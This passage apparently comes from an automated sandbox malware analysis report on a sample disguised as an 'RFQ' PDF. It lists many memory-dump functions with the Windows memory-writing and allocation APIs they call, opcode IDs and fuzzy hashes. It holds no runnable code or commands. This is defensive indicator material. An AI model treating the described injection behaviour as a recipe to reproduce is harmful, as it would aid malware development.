                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 2071b6a618e3a54e77cfee59b9e2b7c43dfae9494f2b1297541248979c4d8571
                              • Instruction ID: d5158fe363a1d83d12d5dbf0c402890b8ec1ac6fc2f382351775aa8daeaf51a0
                              • Opcode Fuzzy Hash: 2071b6a618e3a54e77cfee59b9e2b7c43dfae9494f2b1297541248979c4d8571
                              • Instruction Fuzzy Hash: 3C51BCB1540388DFEF769E24CD887DE7BB6BFA5340F68802ADD494B220C7755A05EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8615, Relevance: 1.6, APIs: 1, Instructions: 141nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: e033983b99f8a65b3b2affa50b8203f06d5294c923a5ba22ff4f7a7e6500661a
                              • Instruction ID: e861c84cd7e71d4f119905b49e470583ef9b259a1a4c7a42d339b6f0fd669a3d
                              • Opcode Fuzzy Hash: e033983b99f8a65b3b2affa50b8203f06d5294c923a5ba22ff4f7a7e6500661a
                              • Instruction Fuzzy Hash: C751BB72544388DFDF769E28CD887DE7BB6BFA5340F68802ADD484B220C7755A05EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8621, Relevance: 1.6, APIs: 1, Instructions: 140nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 9fccf9b4d2a27fc3503f371ab7fa5ce0885b5c32e534fc99460a9df806eb5977
                              • Instruction ID: efb8448459a85218b395f5de8c48ac8dd4b75707a2468d5d77cbb303197888df
                              • Opcode Fuzzy Hash: 9fccf9b4d2a27fc3503f371ab7fa5ce0885b5c32e534fc99460a9df806eb5977
                              • Instruction Fuzzy Hash: EC51CD71540388DFDF769E24CD887DE7BB6BFA5340F68802ADD484B220C7755A05EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B85AD, Relevance: 1.6, APIs: 1, Instructions: 139nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: a0a3a6eee4c60d38ecb8627e02a127eee90db1a7185857c0c085c562b4bfd216
                              • Instruction ID: 14bae201848d682e5427cef62ed4a092626326cdd2ad972365d1906cd3a2dfb4
                              • Opcode Fuzzy Hash: a0a3a6eee4c60d38ecb8627e02a127eee90db1a7185857c0c085c562b4bfd216
                              • Instruction Fuzzy Hash: 3951CC71540388DFDF769E24CD887DE7BB6BFA5340F68802ADD484B220C7715A05EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8594, Relevance: 1.6, APIs: 1, Instructions: 138nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: ce9191d6bfd6ca3fa4bea2be94d7d7c3187640940caf87d26db6d24361d7abb4
                              • Instruction ID: d4956ee472ea341faccde6e45e374d936d8af035fbc12586ac7ea2a3a6e1b40d
                              • Opcode Fuzzy Hash: ce9191d6bfd6ca3fa4bea2be94d7d7c3187640940caf87d26db6d24361d7abb4
                              • Instruction Fuzzy Hash: 7B51ABB2504388DFDF769E24CD887DE7BB6BFA5300F58802ADD488B220C7755A05EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B86C4, Relevance: 1.6, APIs: 1, Instructions: 127nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 3fff1f4fc8c7a394eedc62f8bb8f5c07b8203d52f76a52c45c202f447dbd9f3f
                              • Instruction ID: 5e2a7839445df398e235e5e7c01f7967871d7210928218e38957b4f824689ae7
                              • Opcode Fuzzy Hash: 3fff1f4fc8c7a394eedc62f8bb8f5c07b8203d52f76a52c45c202f447dbd9f3f
                              • Instruction Fuzzy Hash: 38519971544388EFDB769F24CD887DE7BB6BFA6340F69402ADC488B220C7715A45EB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B86FC, Relevance: 1.6, APIs: 1, Instructions: 123nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 4cdd04233f50d830a3655a882153f7d47fb8bf1767297379c9ff1e9ed9d1dd5f
                              • Instruction ID: cd638098dcb4ea9d3202042905c7fed1fdf0b6cde408b0a5b1042eb07730757a
                              • Opcode Fuzzy Hash: 4cdd04233f50d830a3655a882153f7d47fb8bf1767297379c9ff1e9ed9d1dd5f
                              • Instruction Fuzzy Hash: 34519B71540388EFDF769E24CD887DE7BB6BFA5340F68802ADD498B220C7715A45EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8729, Relevance: 1.6, APIs: 1, Instructions: 119nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: f5c27798afb45bacffd3829eeb718f962d073d0ac0baf5d7cf15d7e38d8a0aca
                              • Instruction ID: b259c4512f64a286a2798c843e5819dcb38f22652c1a021f6331a6bd31d0afb1
                              • Opcode Fuzzy Hash: f5c27798afb45bacffd3829eeb718f962d073d0ac0baf5d7cf15d7e38d8a0aca
                              • Instruction Fuzzy Hash: A051CB725443889FDF769F28CD587DE7BB6BFA6300F69401ADC884B220C7755A06EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B94D5, Relevance: 1.6, APIs: 1, Instructions: 116memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 6d43c0312c14dcfd9638274e2c66ae28fa2c74ed271de88196fb8d929b0863e4
                              • Instruction ID: 8764ee0efcc3144c8128d1c1554abf9283998370441eabc6f31e523a8987a0df
                              • Opcode Fuzzy Hash: 6d43c0312c14dcfd9638274e2c66ae28fa2c74ed271de88196fb8d929b0863e4
                              • Instruction Fuzzy Hash: 6941BCB5608388CFDB769E29DC507EE3BA1EF89354F11412DED499B350D3309A01DB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B871D, Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 8c0e512b8f8804225afdd319ef3ca9da1db320ab6c0996f93db66ae7e16a58e6
                              • Instruction ID: e0a71cd6702fdff551fa7c9f9ed26bd327ada0158583fa50d38ad5705ce2e197
                              • Opcode Fuzzy Hash: 8c0e512b8f8804225afdd319ef3ca9da1db320ab6c0996f93db66ae7e16a58e6
                              • Instruction Fuzzy Hash: 5F519972540388EFDF769E24CD497DE7BB6BFA6340F69802ADD484B220C7715A05EB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8735, Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 95e190b79a4e51a376051f70d259f0fe4648341728da5ecf76abfe83a9d12179
                              • Instruction ID: 0d67fd382bfaef26c684d193acd7d835ef088319082cd0b230f7e6967a75d4d4
                              • Opcode Fuzzy Hash: 95e190b79a4e51a376051f70d259f0fe4648341728da5ecf76abfe83a9d12179
                              • Instruction Fuzzy Hash: A351CA72544388AFDF769F24CD487DE7BB6BFA6300F69401ADC484B220C7755A06EB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B870C, Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 7a09e83bfb15b43a2a75b719d940cb4b41e60b3e6572706c14cab75f4d6784f8
                              • Instruction ID: a29d5cec59ecaa5bd549eaf9b2923b8f4635cb4c337ad0cee977e5a4dc1c3688
                              • Opcode Fuzzy Hash: 7a09e83bfb15b43a2a75b719d940cb4b41e60b3e6572706c14cab75f4d6784f8
                              • Instruction Fuzzy Hash: AB519872540288EFEF769E24CD487DE7BB6BFA5340F69402ADC488B220C7715A05EB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B94CA, Relevance: 1.6, APIs: 1, Instructions: 114memorynativeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID:
                              • API String ID: 2616484454-0
                              • Opcode ID: 90d499b63e6d8a6be81a71c29a2be959f6353c8e9d565b7740febdec4c404bc8
                              • Instruction ID: bf78f58d069f6a96ba31d21cc18282d040094495ab5e530869fa68b948c25d9d
                              • Opcode Fuzzy Hash: 90d499b63e6d8a6be81a71c29a2be959f6353c8e9d565b7740febdec4c404bc8
                              • Instruction Fuzzy Hash: D341CCB6608388CFDB769E28DC507EE36A6EF59354F11412DED4A9B710E3318A41DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B94E1, Relevance: 1.6, APIs: 1, Instructions: 113memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 5945d7160aba9eaf2fd3def688188d2e36d4f0102475bf71787302b2c6bb6b06
                              • Instruction ID: acb907ab827bef1e017a93fa3095f3932d44034e97cd9f27b998713ef7949170
                              • Opcode Fuzzy Hash: 5945d7160aba9eaf2fd3def688188d2e36d4f0102475bf71787302b2c6bb6b06
                              • Instruction Fuzzy Hash: B641B9B5608388CBDB769E29DC507EE3BA6EF89314F11412EED4E9A710D2309A41DF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B94ED, Relevance: 1.6, APIs: 1, Instructions: 110memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 67d010fbf3cbdb0e9881c3bb24465603ff34fd9650fbe017c0b0ec27074a1c4c
                              • Instruction ID: d4ccc465da6932933321705cb7fed58d0f2f141597efac6cfb43e227334bcfd8
                              • Opcode Fuzzy Hash: 67d010fbf3cbdb0e9881c3bb24465603ff34fd9650fbe017c0b0ec27074a1c4c
                              • Instruction Fuzzy Hash: 5041AAB5618388CFDB7A9E28DC507EE3BA5EF89314F11412EEE499B710D2305A01DF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B95CD, Relevance: 1.6, APIs: 1, Instructions: 102memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: d845d7a37d3823f3b6e35f76d70c6bc308dc30b06c080e5bac95fed750d70c0c
                              • Instruction ID: fb76099e120b8b559e4cb8d967c1fe21bb49beaf8a277232e44371d460d0b0f4
                              • Opcode Fuzzy Hash: d845d7a37d3823f3b6e35f76d70c6bc308dc30b06c080e5bac95fed750d70c0c
                              • Instruction Fuzzy Hash: EF4178B5204388DFDB769E18CC907EE3BA2EF89364F11812DAD4A9B650E3319A01DF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9518, Relevance: 1.6, APIs: 1, Instructions: 96memorynativeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID:
                              • API String ID: 2616484454-0
                              • Opcode ID: 9eb55a2b9b217230e8bf66c6a976e0811b5b16b387db61f0f48db9754acb2059
                              • Instruction ID: d52f516d48b23dba2f45fb355db67504e121e72dfc0434006eb18caa578a8de4
                              • Opcode Fuzzy Hash: 9eb55a2b9b217230e8bf66c6a976e0811b5b16b387db61f0f48db9754acb2059
                              • Instruction Fuzzy Hash: A33179B5204388CFDB769E18DC907EE36A2EF8D354F11412AAD0D9B750D3319A01DF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B887D, Relevance: 1.6, APIs: 1, Instructions: 90nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 803a3a3eab7667487e2c53cc15c847e9f0d4febc12fda6f040e212ed25f626f9
                              • Instruction ID: 655d3d14920d97459d7aa55146a06bb5a831777c6b3e163cfdca9e506bf0317d
                              • Opcode Fuzzy Hash: 803a3a3eab7667487e2c53cc15c847e9f0d4febc12fda6f040e212ed25f626f9
                              • Instruction Fuzzy Hash: 6241CE72644389AFDF769F24CD487DE7BB6BF6A300F69401ACD984A230C7715A05EB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B964D, Relevance: 1.6, APIs: 1, Instructions: 83memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: e5bf1266986ee1610a639e3b117e772cc5df70042600b4b993c2bc89d71f1158
                              • Instruction ID: 6449deab354812b887a46bb81faa4c745df4cd94357d0d2964a0d67d5fe4f776
                              • Opcode Fuzzy Hash: e5bf1266986ee1610a639e3b117e772cc5df70042600b4b993c2bc89d71f1158
                              • Instruction Fuzzy Hash: E9316B756083889FDB768F28DC507ED3BA2EF89364F158129DD499B250D3315A01DF05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B95A9, Relevance: 1.6, APIs: 1, Instructions: 77memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: eac461942deb5b0a7518dd4ad6743528b148462f31581128b16f0e37d1adce88
                              • Instruction ID: 953cc0978525f75a9fb1411a4f547da76aecb6b30f740b3cae1ad94927b9e3d8
                              • Opcode Fuzzy Hash: eac461942deb5b0a7518dd4ad6743528b148462f31581128b16f0e37d1adce88
                              • Instruction Fuzzy Hash: FA2189B52042888FDB368F28DC547DD3BA2EF9D368F11812AED499B710D3316A01DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B95B5, Relevance: 1.6, APIs: 1, Instructions: 75memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: fa9d17e6bddc0955c7d7eee1898b7716fcdeaf457edb1a7cc973ca9497ab3ceb
                              • Instruction ID: 2fbcad0344f89f333a6732fc85ad6c33e2e1ef290290510278cfb6f861699e86
                              • Opcode Fuzzy Hash: fa9d17e6bddc0955c7d7eee1898b7716fcdeaf457edb1a7cc973ca9497ab3ceb
                              • Instruction Fuzzy Hash: 6721ACB52042888FDB368E28DC107DD3BA2AF8E364F11411AED499B710D3316A02EF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9629, Relevance: 1.6, APIs: 1, Instructions: 74memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: fefe20441731a2d00f985df8cfada1340f8a4e390cbb34142aa0d5d7be9444a0
                              • Instruction ID: 56c0a329329848e1519d298f485de7cde14b6e58c75ae64c4b755c48ecc81264
                              • Opcode Fuzzy Hash: fefe20441731a2d00f985df8cfada1340f8a4e390cbb34142aa0d5d7be9444a0
                              • Instruction Fuzzy Hash: 3C2178B62042888FDB768F29DC507DD3BA2EF99368F11812AED099B710E3316A01DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9635, Relevance: 1.6, APIs: 1, Instructions: 72memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 1d993ee96f31e25b161a62483f203a959390c9ab64dd2c10c8886ff907bf7ffb
                              • Instruction ID: 87c606766c0921e9bce5ce3205f0e640645edc62bd6a6bba9f6d85091925d33c
                              • Opcode Fuzzy Hash: 1d993ee96f31e25b161a62483f203a959390c9ab64dd2c10c8886ff907bf7ffb
                              • Instruction Fuzzy Hash: A0219DB52042898FDB768F29DC507DD3BA2AF8A364F114119ED499B710E3305A02DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B959E, Relevance: 1.6, APIs: 1, Instructions: 72memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 30edf8b884ff11c48c44f6f8a442bbfc581ec70aa6a378d231f348c276b8fff9
                              • Instruction ID: 73812771cc097d1a4a41f6084cf717c5f8045c054035b08eeda03a1b82428c4e
                              • Opcode Fuzzy Hash: 30edf8b884ff11c48c44f6f8a442bbfc581ec70aa6a378d231f348c276b8fff9
                              • Instruction Fuzzy Hash: F92148B52042888FDB768F18DC547ED3BA2EF8D364F118129AD0DAB710D3315A01DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B95C1, Relevance: 1.6, APIs: 1, Instructions: 70memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 3ffa23b1997e9fbe7513cdae4601b91b9d7094edce94c6936184a1e03c5cbf1c
                              • Instruction ID: a62a6d48f07ecfa77e9696c4ccf2e542aa13eba792e4c1bf95e33311e23abc67
                              • Opcode Fuzzy Hash: 3ffa23b1997e9fbe7513cdae4601b91b9d7094edce94c6936184a1e03c5cbf1c
                              • Instruction Fuzzy Hash: 982168B5244288CEDB769E29CC507DD3BA6AF8D364F118129ED499B710E2306A02EF10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9641, Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 0a2a39e7b8c083412da493786a988ea7e3d50cb603a2ca84c5854a67d27a0b04
                              • Instruction ID: af70238380100c20ab55a8c677722a018f9400f38a397f5785510e877f7175a0
                              • Opcode Fuzzy Hash: 0a2a39e7b8c083412da493786a988ea7e3d50cb603a2ca84c5854a67d27a0b04
                              • Instruction Fuzzy Hash: FB215BB5214288CFDB769E29CC507DD3BA2EF89364F114529ED0D9B710E3305A02EF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B96FD, Relevance: 1.6, APIs: 1, Instructions: 64memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
